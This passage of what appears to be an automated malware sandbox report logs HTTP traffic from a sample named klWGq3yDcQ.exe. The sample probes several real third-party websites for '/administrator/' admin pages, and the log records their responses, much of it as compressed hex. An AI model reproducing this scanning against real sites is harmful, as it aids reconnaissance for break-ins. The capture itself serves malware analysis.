                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xeiKGnCYBFRFcAiJL0%2BoLIs9wIHYZK3qKIE9EBs4HvqgjUnyLgGT1nptd8GV71cYaSlZpKcLBgk9b6F9QE14hMqCT0nSePEEMzUmMpA%2FcRJ3082u9WKymD4iHsd0piAE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7de3bbb590e-IAD
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    21192.168.2.455059178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.250561953 CET237OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.418154001 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:02 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    22192.168.2.45506074.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.267879963 CET234OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.638356924 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    23192.168.2.455058139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.271151066 CET235OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: hmichaelandco.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.093986034 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                    content-encoding: gzip
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 32 66 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33
                                                                                                                                                                                                    Data Ascii: 2f93}ks6gX,IQ/?d9dS&7[9*$Pd{=Ao_v Az*1FW]JB,+bI9G4#3z;v|B|y/I'RGGWK"ze ~KB6vt8~;wPKIHg4D?9:A5Y^&eH,YxE4!%HXq7<8pb|B_L+-22;QXpI(d~UwzA/yf?M%8Mc>vigg.w^)?X;-+f4G[k8A8e:W%#X"@Hw(PDf4A oY"J@c,(:C-**1rVDF"NHP21c#E}%s1i~@ct?KSG}GNQ7^ pA=, p/8!Oi?,:.SERN`C_MAXh'ZU0i5Q$3&&BM%MAnf>B4FM3WmS6NL%~yshTr>5TDR*9ly~B$,">M8d2B73
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094002962 CET1340INData Raw: 17 f1 7d 4c 7f 68 ef ea 5c 57 9d 7d ba e9 a8 d1 90 83 f4 9b 38 46 34 41 3f 25 04 bd fb e6 27 34 f0 03 bf 7b 0e 6a ef df 20 87 a0 22 26 d7 3f e3 39 41 09 13 68 c6 56 49 84 3e 23 f4 dd 8f 6a a0 44 27 78 99 5e a2 b7 cc bf ea a8 bc 50 4a da 10 6a 48
                                                                                                                                                                                                    Data Ascii: }Lh\W}8F4A?%'4{j "&?9AhVI>#jD'x^PJjHnIDn5,',!*t-iB`YGu@!DDhpgvK Yq;0PN_nd&;Ib[jt1#$R5(xa:wIC9G74?I}
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094017029 CET1340INData Raw: 9a 64 02 6c 61 0f c7 74 9e 8c 90 17 f8 1b 90 41 84 e7 19 18 e4 75 04 a5 38 8a 60 84 41 41 89 9e 07 60 1e f0 ec fa c8 32 be 9b 32 89 2f 08 11 4d 44 a3 71 f3 26 f5 a6 31 0b 3f 79 31 9d 66 38 bb f3 42 ce 9b 48 9b cc bb d6 ca 8c 55 d4 09 39 ef 44 94
                                                                                                                                                                                                    Data Ascii: dlatAu8`AA`22/MDq&1?y1f8BHU9DN-[QS5I\KQ<n85I"qOV`^4XvB;No$-Yuc6EY.ZAXE^MYtwy71N,fMc~@.kw87'
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094053030 CET1340INData Raw: b0 2e 7b 3e c2 c3 75 d8 53 70 3d 45 77 3d 01 cf 13 74 d6 13 b0 3c 5e 57 3d 01 c9 63 75 d4 93 51 6c d5 4d 15 0a 8a 65 48 6d fc e5 eb b7 85 7e b4 4c 9d 3a 05 90 97 d8 b7 d8 5c 27 f7 15 11 2a c8 29 86 a8 7c 6d da b2 2a 0e 26 e9 90 45 e8 3a ba ca 4b
                                                                                                                                                                                                    Data Ascii: .{>uSp=Ew=t<^W=cuQlMeHm~L:\'*)|m*&E:Kz<i?5/I^Xs~Qv)YtB,4K/rx,T%H5kBSQ^~2\fIYXrW:E5B5jr5 eG]F~
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094065905 CET1340INData Raw: 0a ed f4 25 a1 a9 a6 55 10 3d 79 26 c5 dd 48 1d 02 21 65 b7 b9 4f 78 41 40 10 76 d1 a2 27 ff ed cb 7f 07 f2 df a1 fc f7 14 61 a4 c1 df c8 c0 5b 08 5b 5a 90 8c 8a 5c f2 f3 77 05 6c b4 60 6b 92 29 90 f9 73 1f e1 fc 79 60 3d 0f ad e7 d3 e2 59 67 96
                                                                                                                                                                                                    Data Ascii: %U=y&H!eOxA@v'a[[Z\wl`k)sy`=Yg?\-zZ>Ek"qv6Q|*$]EISEt4&aAh>HpYP9riT,9*}iD8CZ='-NxZtq>Iyd5q,|`+&3
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094118118 CET1340INData Raw: 87 5f 87 9f 80 85 3e 87 a7 2d 8d 29 39 fe 2b 1c 11 3b c5 19 97 d9 e5 5e 07 ac 6a be f0 ce 87 3e 10 08 3a fe 6c 15 c7 12 4d 95 aa 8b d9 c5 ec e2 d2 4c 0b 8c 70 80 95 25 8f f3 b2 84 ec 78 0a 47 9c 85 d9 6a 39 e5 65 f9 82 b8 70 40 62 65 70 4b 6f 2f
                                                                                                                                                                                                    Data Ascii: _>-)9+;^j>:lMLp%xGj9ep@bepKo/1*VagJI"bd5rfLaltX5W"'-JSI(&B)d]`O:St^o;S[jjJ/%I"4%a*j!M>Tj"-t&
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094130993 CET1340INData Raw: 14 60 84 be aa 0a b5 71 be c5 3a 4c 7d 70 fa 2f 66 db 85 e2 b0 b0 e6 99 34 0e b7 9a a0 67 9d b5 85 4d 83 4f 62 ca 85 1e c8 50 95 c8 6a f3 a9 f1 6e 12 e3 3b 92 91 c8 68 a0 70 c1 38 b8 51 96 95 7d 45 a7 d9 52 a0 c1 98 c9 1d dc c0 34 67 19 25 dc 62
                                                                                                                                                                                                    Data Ascii: `q:L}p/f4gMObPjn;hp8Q}ER4g%b8?v|+pV4B]JC#v;97S!N!/BlWjg)x=,9\V(4)K<=90++;TyY4yqpIedn%/U5i$<e,[k
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094141960 CET1340INData Raw: 9d b0 6b 86 c0 b0 43 f2 02 3f 92 c1 51 68 28 3f a3 c1 87 7b c9 e1 5e f4 f7 74 86 62 41 d0 f7 df a0 8b 0f d7 d6 f1 12 ea 10 3b 38 41 cc 9c 2e 01 76 00 9c 5c b5 f7 dc 8a 1b d8 55 96 33 ed 8e b9 6d b0 e6 80 0f b8 39 71 1d 4e 62 41 26 94 5c 80 d9 09
                                                                                                                                                                                                    Data Ascii: kC?Qh(?{^tbA;8A.v\U3m9qNbA&\59H\_zO>x}_Sx>1y8!q%I!]gyKbgrhNcR6Nr$CksG)D.a~p7=J5K8&uhUh]1#
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094153881 CET1340INData Raw: d2 68 50 8a 06 1e 8f 72 3d d3 38 52 a6 13 c9 c0 78 02 3b 06 14 4e 29 4e b6 68 19 15 b8 9e db 26 60 14 d8 8a ae 64 88 94 be d4 5a 1c 55 6c d2 ce 30 16 d1 ff 37 3a 8a b5 89 9d e6 d1 4b 8f e2 b6 04 e5 ba ff d8 b1 c5 a2 18 01 21 ee 1b 8c 3d d3 6a 33
                                                                                                                                                                                                    Data Ascii: hPr=8Rx;N)Nh&`dZUl07:K!=j3fCCi#C3+0i#[mL\f3D3#4cKCEzAI{Nh',FJB1AkqP,c
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.094166040 CET1108INData Raw: be 93 d7 65 f1 e2 c9 6e db fc fe a5 3c df 1f 44 e6 0e f6 15 a8 95 a7 5f 0d 07 ab 59 fe 7c 22 d3 8c 08 71 f7 f3 82 09 e6 7f e4 76 eb aa 2f 29 7c f9 f3 c9 a2 9c 09 96 12 3f fd 34 8f 6a f8 a6 3f ff f9 74 19 53 13 2c 10 9b 59 79 fa 7f 03 49 31 b9 55
                                                                                                                                                                                                    Data Ascii: en<D_Y|"qv/)|?4j?tS,YyI1Ub50'Ly(GO*QC{C]>h}YqP8j&#9Ryj?3n4Z,h8nrhv9_a0rkvFCJl4nM:
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.281455040 CET74INData Raw: 61 0d 0a 03 00 04 20 5a 45 1e b9 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: a ZE0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.283158064 CET294OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: hmichaelandco.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://hmichaelandco.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.070030928 CET455INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    x-redirect-by: WordPress
                                                                                                                                                                                                    location: http://hmichaelandco.com/administrator/
                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.073219061 CET285OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: hmichaelandco.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://hmichaelandco.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.909509897 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                    content-length: 12182
                                                                                                                                                                                                    content-encoding: gzip
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 26 37 93 9c ad 5b 93 39 2a 88 84 24 cc 50 04 97 80 64 7b 3d fe 41 f7 6f dc 5f 76 ab f1 20 41 8a 7a f8 91 9c f3 e1 2a 95 31 09 02 dd 8d 46 a3 d1 00 ba 81 ab 57 11 0b c5 5d 4a d0 42 2c e3 eb a3 2b f8 83 62 9c cc c7 0e 49 bc df de 39 47 8d 34 23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33 17 f1 7d 4c 7f 68 ef ea 5c 57 9d
                                                                                                                                                                                                    Data Ascii: }ks6gX,IQ/?d9dS&7[9*$Pd{=Ao_v Az*1FW]JB,+bI9G4#3z;v|B|y/I'RGGWK"ze ~KB6vt8~;wPKIHg4D?9:A5Y^&eH,YxE4!%HXq7<8pb|B_L+-22;QXpI(d~UwzA/yf?M%8Mc>vigg.w^)?X;-+f4G[k8A8e:W%#X"@Hw(PDf4A oY"J@c,(:C-**1rVDF"NHP21c#E}%s1i~@ct?KSG}GNQ7^ pA=, p/8!Oi?,:.SERN`C_MAXh'ZU0i5Q$3&&BM%MAnf>B4FM3WmS6NL%~yshTr>5TDR*9ly~B$,">M8d2B73}Lh\W


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    24192.168.2.4551223.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.282030106 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.380167007 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:35:06 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2aa-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_EXWXi1Al8NLdGiK28PboMgqpixh1wQzt359tax0S8ljKgrnEC8oM7/8VbD5F4wO8qTRgIsVZO7srFpMd2fHTHw
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 